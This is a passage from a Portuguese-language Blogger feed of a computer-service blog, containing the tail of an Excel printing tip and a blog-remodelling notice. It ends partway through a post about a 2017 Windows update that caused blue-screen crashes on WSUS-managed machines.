  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;37&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;Bibliography&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;TOC Heading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;41&quot; Name=&quot;Plain Table 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;42&quot; Name=&quot;Plain Table 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;43&quot; Name=&quot;Plain Table 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;44&quot; Name=&quot;Plain Table 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;45&quot; Name=&quot;Plain Table 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;40&quot; Name=&quot;Grid Table Light&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot; Name=&quot;Grid Table 1 Light&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;Grid Table 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;Grid Table 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;Grid Table 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;Grid Table 5 Dark&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot; Name=&quot;Grid Table 6 Colorful&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot; Name=&quot;Grid Table 7 Colorful&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;Grid Table 1 Light Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;Grid Table 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;Grid Table 3 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;Grid Table 4 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;Grid Table 5 Dark Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;Grid Table 6 Colorful Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;Grid Table 7 Colorful Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;Grid Table 1 Light Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;Grid Table 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;Grid Table 3 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;Grid Table 4 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;Grid Table 5 Dark Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;Grid Table 6 Colorful Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;Grid Table 7 Colorful Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;Grid Table 1 Light Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;Grid Table 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;Grid Table 3 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;Grid Table 4 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;Grid Table 5 Dark Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;Grid Table 6 Colorful Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;Grid Table 7 Colorful Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;Grid Table 1 Light Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;Grid Table 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;Grid Table 3 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;Grid Table 4 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;Grid Table 5 Dark Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;Grid Table 6 Colorful Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;Grid Table 7 Colorful Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;Grid Table 1 Light Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;Grid Table 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;Grid Table 3 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;Grid Table 4 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;Grid Table 5 Dark Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;Grid Table 6 Colorful Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;Grid Table 7 Colorful Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;Grid Table 1 Light Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;Grid Table 2 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;Grid Table 3 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;Grid Table 4 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;Grid Table 5 Dark Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;Grid Table 6 Colorful Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;Grid Table 7 Colorful Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot; Name=&quot;List Table 1 Light&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;List Table 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;List Table 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;List Table 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;List Table 5 Dark&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot; Name=&quot;List Table 6 Colorful&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot; Name=&quot;List Table 7 Colorful&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;List Table 1 Light Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;List Table 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;List Table 3 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;List Table 4 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;List Table 5 Dark Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;List Table 6 Colorful Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;List Table 7 Colorful Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;List Table 1 Light Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;List Table 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;List Table 3 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;List Table 4 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;List Table 5 Dark Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;List Table 6 Colorful Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;List Table 7 Colorful Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;List Table 1 Light Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;List Table 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;List Table 3 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;List Table 4 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;List Table 5 Dark Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;List Table 6 Colorful Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;List Table 7 Colorful Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;List Table 1 Light Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;List Table 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;List Table 3 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;List Table 4 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;List Table 5 Dark Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;List Table 6 Colorful Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;List Table 7 Colorful Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;List Table 1 Light Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;List Table 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;List Table 3 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;List Table 4 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;List Table 5 Dark Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;List Table 6 Colorful Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;List Table 7 Colorful Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;List Table 1 Light Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;List Table 2 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;List Table 3 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;List Table 4 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;List Table 5 Dark Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;List Table 6 Colorful Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;List Table 7 Colorful Accent 6&quot;/&gt;
 &lt;/w:LatentStyles&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-priority:99;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin-top:0cm;
 mso-para-margin-right:0cm;
 mso-para-margin-bottom:8.0pt;
 mso-para-margin-left:0cm;
 line-height:107%;
 mso-pagination:widow-orphan;
 font-size:11.0pt;
 font-family:&quot;Calibri&quot;,sans-serif;
 mso-ascii-font-family:Calibri;
 mso-ascii-theme-font:minor-latin;
 mso-hansi-font-family:Calibri;
 mso-hansi-theme-font:minor-latin;
 mso-fareast-language:EN-US;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span lang=&quot;PT&quot; style=&quot;mso-ansi-language: PT;&quot;&gt;Figura 1. A guia Recursos da caixa de diálogo Propriedades do documento da
impressora.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span lang=&quot;PT&quot; style=&quot;mso-ansi-language: PT;&quot;&gt;Usando o controle Páginas por folha (ou o controle de múltiplas páginas),
especifique quantas páginas deseja imprimir em cada folha de papel.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span lang=&quot;PT&quot; style=&quot;mso-ansi-language: PT;&quot;&gt;Clique em OK para descartar a caixa de diálogo Propriedades da impressora.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span lang=&quot;PT&quot; style=&quot;mso-ansi-language: PT;&quot;&gt;Clique em OK para descartar a caixa de diálogo Configurar página.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span lang=&quot;PT&quot; style=&quot;font-family: &amp;quot;calibri&amp;quot; , sans-serif; font-size: 11.0pt; line-height: 107%;&quot;&gt;O ExcelTips é a sua fonte de treinamento econômico do
Microsoft Excel. &lt;/span&gt;&lt;span title=&quot;This tip (6214) applies to Microsoft Excel 2007, 2010, and 2013. You can find a version of this tip for the older menu interface of Excel here: Printing Multiple Pages On a Piece of Paper.&quot;&gt;Esta
dica (6214) se aplica ao Microsoft Excel 2007, 2010 e 2013. Você pode encontrar
uma versão desta dica para a interface de menu mais antiga do Excel.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span title=&quot;This tip (6214) applies to Microsoft Excel 2007, 2010, and 2013. You can find a version of this tip for the older menu interface of Excel here: Printing Multiple Pages On a Piece of Paper.&quot;&gt;-------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;br /&gt;
&lt;span title=&quot;This tip (6214) applies to Microsoft Excel 2007, 2010, and 2013. You can find a version of this tip for the older menu interface of Excel here: Printing Multiple Pages On a Piece of Paper.&quot;&gt;Patrocinado&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span title=&quot;This tip (6214) applies to Microsoft Excel 2007, 2010, and 2013. You can find a version of this tip for the older menu interface of Excel here: Printing Multiple Pages On a Piece of Paper.&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFuKjy9sWSe17bRGV-d8jyhoPHSSWb3W8LGgAlnPK_leFyDG1hOn_K1D5wRcPCv7gd-6n5cOYxKufWyf4HEZKT_8zM1FaE4qGKJKOQW23pZ4w8I12UMdnzTZ1nbZzQQeLnfhmmpM4UR7Y/s1600/banner_topo.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;136&quot; data-original-width=&quot;407&quot; height=&quot;106&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFuKjy9sWSe17bRGV-d8jyhoPHSSWb3W8LGgAlnPK_leFyDG1hOn_K1D5wRcPCv7gd-6n5cOYxKufWyf4HEZKT_8zM1FaE4qGKJKOQW23pZ4w8I12UMdnzTZ1nbZzQQeLnfhmmpM4UR7Y/s320/banner_topo.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span title=&quot;This tip (6214) applies to Microsoft Excel 2007, 2010, and 2013. You can find a version of this tip for the older menu interface of Excel here: Printing Multiple Pages On a Piece of Paper.&quot;&gt;&amp;nbsp;Rodovia Amaral Peixoto Km 70 - Bacaxá - Saquarema - RJ&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span title=&quot;This tip (6214) applies to Microsoft Excel 2007, 2010, and 2013. You can find a version of this tip for the older menu interface of Excel here: Printing Multiple Pages On a Piece of Paper.&quot;&gt;Tel (022) 2653-0845&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span title=&quot;This tip (6214) applies to Microsoft Excel 2007, 2010, and 2013. You can find a version of this tip for the older menu interface of Excel here: Printing Multiple Pages On a Piece of Paper.&quot;&gt;www.casaegranito.com.br&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span title=&quot;This tip (6214) applies to Microsoft Excel 2007, 2010, and 2013. You can find a version of this tip for the older menu interface of Excel here: Printing Multiple Pages On a Piece of Paper.&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span title=&quot;This tip (6214) applies to Microsoft Excel 2007, 2010, and 2013. You can find a version of this tip for the older menu interface of Excel here: Printing Multiple Pages On a Piece of Paper.&quot;&gt;--------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span title=&quot;This tip (6214) applies to Microsoft Excel 2007, 2010, and 2013. You can find a version of this tip for the older menu interface of Excel here: Printing Multiple Pages On a Piece of Paper.&quot;&gt;&amp;nbsp;&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
</description><link>http://computersservicetecnica.blogspot.com/2018/07/imprimir-varias-paginas-do-excel-em-uma.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-ZIoeJQ2hbc42XnY0Qcw2uQ8JIjy7uD6ZlMeR8SrX4Jn_6tr4SCQZSoUWvhbaQ4UH8wqBzoZA2bcbZlZQDJpSJi9MNPOxk9KteuLZ2gSXfl7_Bf6CW9RKB3huLW0ktJjBEROv2D-cGn4/s72-c/T6214F1.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-7255510364580658277</guid><pubDate>Sun, 15 Jul 2018 15:14:00 +0000</pubDate><atom:updated>2018-07-15T12:14:57.732-03:00</atom:updated><title>Remodelagem de nosso blog</title><description>Estamos remodelando todo o nosso blog, para trazer novas postagens que com certeza vai agradar ao público.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Aguardem !!, muitas novidades estão por vir, fiquem atentos !!!&lt;br /&gt;
&lt;br /&gt;
Agradecemos a todos a compreensão&lt;br /&gt;
&lt;br /&gt;</description><link>http://computersservicetecnica.blogspot.com/2018/07/remodelagem-de-nosso-blog.html</link><author>noreply@blogger.com (Computers Service Informática)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-1201253723138421386</guid><pubDate>Sun, 15 Oct 2017 20:44:00 +0000</pubDate><atom:updated>2017-10-15T18:44:49.273-02:00</atom:updated><title></title><description>&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 17px;&quot;&gt;Atualização do Windows causa &#39;tela azul da morte&#39;; entenda o problema&lt;/span&gt;&lt;/h2&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcE-rRVmu_cHQSxsmn8tBL4ZhjYh5tUQ0WmrokMc0MyOChkvEuS25vLLkygCE3hPJ1PJEbAdRk69mBbuq3ZhbXCDPM7XVd5aL01AoY-lV5-svRG3m7Ded5ScZP8x_FUSYY2ShtG2u2gOY/s1600/tela+da+morte.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;420&quot; data-original-width=&quot;860&quot; height=&quot;640&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcE-rRVmu_cHQSxsmn8tBL4ZhjYh5tUQ0WmrokMc0MyOChkvEuS25vLLkygCE3hPJ1PJEbAdRk69mBbuq3ZhbXCDPM7XVd5aL01AoY-lV5-svRG3m7Ded5ScZP8x_FUSYY2ShtG2u2gOY/s640/tela+da+morte.jpg&quot; width=&quot;564&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;!--[if !mso]&gt;
&lt;style&gt;
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
Uma atualização recente do Windows liberada nesta
semana pela Microsoft causou problemas em alguns computadores. Um pacote de
correções problemático fez com que alguns computadores ficassem impedidos de
ligar e apresentassem a famigerada “tela azul da morte”.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
O problema veio com a “Patch Tuesday”, a segunda
terça-feira do mês, quando a Microsoft distribui suas correções mensais de bugs
e pacotes de segurança. No entanto, após a publicação, os fóruns da empresa
começaram a receber várias reclamações de usuários do Windows em PCs de
diversas fabricantes e até mesmo em computadores montados de forma
independente.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
A Microsoft atribui o problema a um erro de
publicação, atingindo principalmente os clientes corporativos. O problema da
“tela azul da morte” atingiu computadores com Windows 10 versão 1703, Windows
10 versão 1607 e Windows Server 2016 atrás do WSUS (Windows Server Update
Services). Um representante da empresa nos fóruns afirmou que a Microsoft
publicou acidentalmente os updates delta pelo canal WSUS, e os computadores que
pegaram os dois acabaram com problemas. Usuários que receberam a atualização
pelo Windows Update normalmente não são afetados.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: white; text-align: justify;&quot;&gt;
&lt;img height=&quot;32&quot; src=&quot;file:///C:\DOCUME~1\ROBERT~1\CONFIG~1\Temp\msohtml1\01\clip_image001.gif&quot; style=&quot;height: 0px; position: absolute; visibility: hidden; width: 0px; z-index: 0;&quot; width=&quot;32&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
A empresa diz que o problema já foi corrigido e
validado, mas existem três cenários em que máquinas ainda podem estar afetadas
pela falha:&lt;/div&gt;
&lt;ol start=&quot;1&quot; type=&quot;1&quot;&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt; text-align: justify;&quot;&gt;Os
     Administradores do WSUS/SCCM que sincronizaram a atualização de 10 de
     outubro (KB4041676 ou KB4041691) antes das 16h PDT em 10 de outubro ainda
     podem ter esses KBs armazenados em cache.&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt; text-align: justify;&quot;&gt;Dispositivos
     gerenciados&amp;nbsp;WSUS/SCCM que baixaram a atualização KB4041676 ou
     KB4041691 de 10 de outubro com problemas de publicação e têm dispositivos
     em um estado de reinicialização pendente.&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt; text-align: justify;&quot;&gt;Dispositivos
     gerenciados WSUS/SCCM que instalaram a atualização KB4041676 ou KB4041691
     de 10 de outubro e não conseguem ser inicializados e/ou podem exibir uma
     tela de recuperação.&lt;/li&gt;
&lt;/ol&gt;
&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;O primeiro problema é mais simples, bastando apenas
escanear novamente atrás de atualizações. Os cenários 2 e 3 são mais complexos
e requerem uma série de ações para retomar a operação da máquina. Para receber
